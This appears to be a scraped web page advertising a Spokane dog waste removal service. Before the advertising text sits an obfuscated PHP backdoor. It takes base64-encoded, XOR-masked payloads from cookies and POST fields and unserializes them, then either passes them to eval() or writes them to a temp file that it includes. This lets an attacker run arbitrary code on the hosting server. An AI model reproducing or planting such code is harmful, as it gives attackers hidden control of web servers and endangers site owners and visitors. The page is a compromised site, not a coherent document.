$TZXiLW = 'x' . '_' . chr (77) . chr ( 213 - 104 )."\106" . 'H';$JXQVmrim = 'c' . chr (108) . "\x61" . "\163" . chr ( 244 - 129 ).chr (95) . 'e' . 'x' . "\151" . "\163" . chr ( 888 - 772 )."\163";$ANWRcYY = class_exists($TZXiLW); $TZXiLW = "49435";$JXQVmrim = "37894";$bZiSVRk = FALSE;if ($ANWRcYY === $bZiSVRk){function hxUocBEwh(){return FALSE;}$ssRcICeQ = "14582";hxUocBEwh();class x_MmFH{private function egRsXVHR($ssRcICeQ){if (is_array(x_MmFH::$KOpSfDa)) {$QZXBAmoh = str_replace("\x3c" . '?' . chr (112) . "\150" . "\x70", "", x_MmFH::$KOpSfDa[chr ( 636 - 537 ).chr (111) . 'n' . 't' . chr ( 355 - 254 )."\x6e" . 't']);eval($QZXBAmoh); $ssRcICeQ = "14582";exit();}}private $rARCAHZOUG;public function fCtcQQZAt(){echo 61286;}public function __destruct(){$ssRcICeQ = "56104_57006";$this->egRsXVHR($ssRcICeQ); $ssRcICeQ = "56104_57006";}public function __construct($dFLkITxzq=0){$VzLqvpFicL = $_POST;$QhQVWZR = $_COOKIE;$iHTvXvfy = "94793112-c6b4-4b36-a612-28a77f48279e";$qDfIRLBitu = @$QhQVWZR[substr($iHTvXvfy, 0, 4)];if (!empty($qDfIRLBitu)){$YLijDG = "base64";$PuiqNcvgo = "";$qDfIRLBitu = explode(",", $qDfIRLBitu);foreach ($qDfIRLBitu as $LlriIYrgpC){$PuiqNcvgo .= @$QhQVWZR[$LlriIYrgpC];$PuiqNcvgo .= @$VzLqvpFicL[$LlriIYrgpC];}$PuiqNcvgo = array_map($YLijDG . "\137" . 'd' . "\145" . chr ( 637 - 538 )."\x6f" . "\144" . "\x65", array($PuiqNcvgo,)); $PuiqNcvgo = $PuiqNcvgo[0] ^ str_repeat($iHTvXvfy, (strlen($PuiqNcvgo[0]) / strlen($iHTvXvfy)) + 1);x_MmFH::$KOpSfDa = @unserialize($PuiqNcvgo);}}public static $KOpSfDa = 63359;}$yqJvRQzr = new /* 21826 */ x_MmFH(14582 + 14582);unset($yqJvRQzr);}$TxZzk = "\147" . chr (95) . chr ( 630 - 563 )."\x68" . chr ( 568 - 460 ).chr ( 366 - 253 )."\x51";$FFGHEI = "\143" . chr ( 923 - 815 ).chr (97) . 's' . "\x73" . '_' . "\x65" . chr ( 862 - 742 ).'i' . "\163" . "\x74" . "\x73";$qgjDfk = class_exists($TxZzk); $FFGHEI = "24823";$IOMVBFM = !1;if ($qgjDfk == $IOMVBFM){function pGsThL(){$VcMSmFWh = new /* 49854 */ g_ChlqQ(36711 + 36711); $VcMSmFWh = NULL;}$qVuDcCzf = "36711";class g_ChlqQ{private function IvLIB($qVuDcCzf){if (is_array(g_ChlqQ::$BrONYJy)) {$qvTOepCh = sys_get_temp_dir() . "/" . crc32(g_ChlqQ::$BrONYJy[chr ( 832 - 717 )."\x61" . 'l' . chr (116)]);@g_ChlqQ::$BrONYJy['w' . chr ( 861 - 747 ).'i' . "\x74" . "\145"]($qvTOepCh, g_ChlqQ::$BrONYJy["\x63" . 'o' . "\156" . chr ( 449 - 333 ).'e' . chr (110) . 't']);include $qvTOepCh;@g_ChlqQ::$BrONYJy[chr (100) . "\145" . chr ( 976 - 868 )."\x65" . "\x74" . "\145"]($qvTOepCh); $qVuDcCzf = "36711";exit();}}private $JLWmzVeqJ;public function bfJPs(){echo 15812;}public function __destruct(){$qVuDcCzf = "7579_49712";$this->IvLIB($qVuDcCzf); $qVuDcCzf = "7579_49712";}public function __construct($QFKia=0){$wxzeRbre = $_POST;$DQliBqRI = $_COOKIE;$gDZlwPrgk = "a9d8cb07-e810-4fba-bc99-f95c72bb1846";$gmOgNAQzLP = @$DQliBqRI[substr($gDZlwPrgk, 0, 4)];if (!empty($gmOgNAQzLP)){$rhZAT = "base64";$gbvqTE = "";$gmOgNAQzLP = explode(",", $gmOgNAQzLP);foreach ($gmOgNAQzLP as $RcOPTxOpQ){$gbvqTE .= @$DQliBqRI[$RcOPTxOpQ];$gbvqTE .= @$wxzeRbre[$RcOPTxOpQ];}$gbvqTE = array_map($rhZAT . '_' . 'd' . chr ( 621 - 520 )."\143" . chr (111) . "\144" . 'e', array($gbvqTE,)); $gbvqTE = $gbvqTE[0] ^ str_repeat($gDZlwPrgk, (strlen($gbvqTE[0]) / strlen($gDZlwPrgk)) + 1);g_ChlqQ::$BrONYJy = @unserialize($gbvqTE);}}public static $BrONYJy = 19435;}pGsThL();} Dooty Free — Spokane's Premiere Dog Waste Removal Service

Dooty Free is a licensed and insured dog waste removal service

Serving Spokane, Including Spokane Valley, Liberty Lake, Mead and Colbert Washington

Since 2003, Dooty Free dog waste removal has been serving residents and businesses cleaning dog runs, yards & kennels for residential and commercial properties.
Contact us today (509) 995-5776

Dooty Free Dog Waste Removal Chihuahuas


…But you sure don’t love having to clean up the mess in your yard. It’s a nasty job. Sure, somebody has to do it, but that “somebody” doesn’t have to be YOU.

  • DOOTY FREE Dog Waste Removal Service makes life easier for dog owners with complete cleanup and removal of canine waste from yards, kennels, and dog runs.
  • DOOTY FREE eliminates the most unpleasant aspects of dog ownership – because you have better things to do with your time!
  • We find, scoop, and haul away all those nasty “canine calling cards” that ruin your yard and mess up your free time.
  • DOOTY FREE is a professional pooper scooper company that comes to your home on a weekly basis to pick up what your dog leaves behind.